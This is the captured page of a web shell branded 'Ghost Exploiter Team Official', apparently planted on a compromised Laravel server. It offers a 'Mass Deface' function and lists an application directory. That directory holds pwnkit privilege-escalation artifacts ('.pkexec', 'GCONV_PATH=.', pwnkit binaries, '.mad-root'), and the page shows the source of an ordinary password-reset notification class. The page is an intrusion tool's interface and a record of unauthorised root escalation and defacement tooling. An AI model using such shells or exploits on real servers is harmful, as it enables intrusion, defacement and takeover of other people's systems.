Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
app
/
Http
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
.pkexec
--
ren
Controllers
--
ren
GCONV_PATH=.
--
ren
Resources
--
ren
.mad-root
0KB
edt
ren
BankService.php
0KB
edt
ren
BaseService.php
0.099KB
edt
ren
CashFlowService.php
0KB
edt
ren
ClockInterface.php
0.546KB
edt
ren
CqrsServiceProvider.php
0KB
edt
ren
OpenApiValidationErrorR
...
0KB
edt
ren
PaginationDto.php
0KB
edt
ren
ResetPasswordNotificati
...
1.28KB
edt
ren
TokenResponse.php
1.604KB
edt
ren
auth.php
0KB
edt
ren
pwnkit
10.992KB
edt
ren
pwnkit-20260128043908.
10.992KB
edt
ren
services.php
0KB
edt
ren
<?php declare(strict_types=1); namespace App\Notifications; use Illuminate\Auth\Notifications\ResetPassword as BaseResetPassword; use Illuminate\Bus\Queueable; use Illuminate\Queue\SerializesModels; final class ResetPasswordNotification extends BaseResetPassword { use Queueable; use SerializesModels; private const DOMAIN = 'http://gitep.dev-top-it.ru'; public function toMail($notifiable): MailMessage { $url = $this->createUrl(notifiable: $notifiable); return (new \Illuminate\Notifications\Messages\MailMessage()) ->subject(subject: 'Сброс пароля') ->line(line: 'Вы получили это сообщение, потому что мы получили запрос на сброс пароля для вашей учетной записи.') ->action(text: 'Сбросить пароль', url: $url) ->line(line: 'Если вы не запрашивали сброс пароля, никаких дальнейших действий не требуется.'); } protected function createUrl($notifiable): string { return self::DOMAIN . '/password/set?token=' . $this->token . '&email=' . urlencode( string: $notifiable->getEmailForPasswordReset() ); } }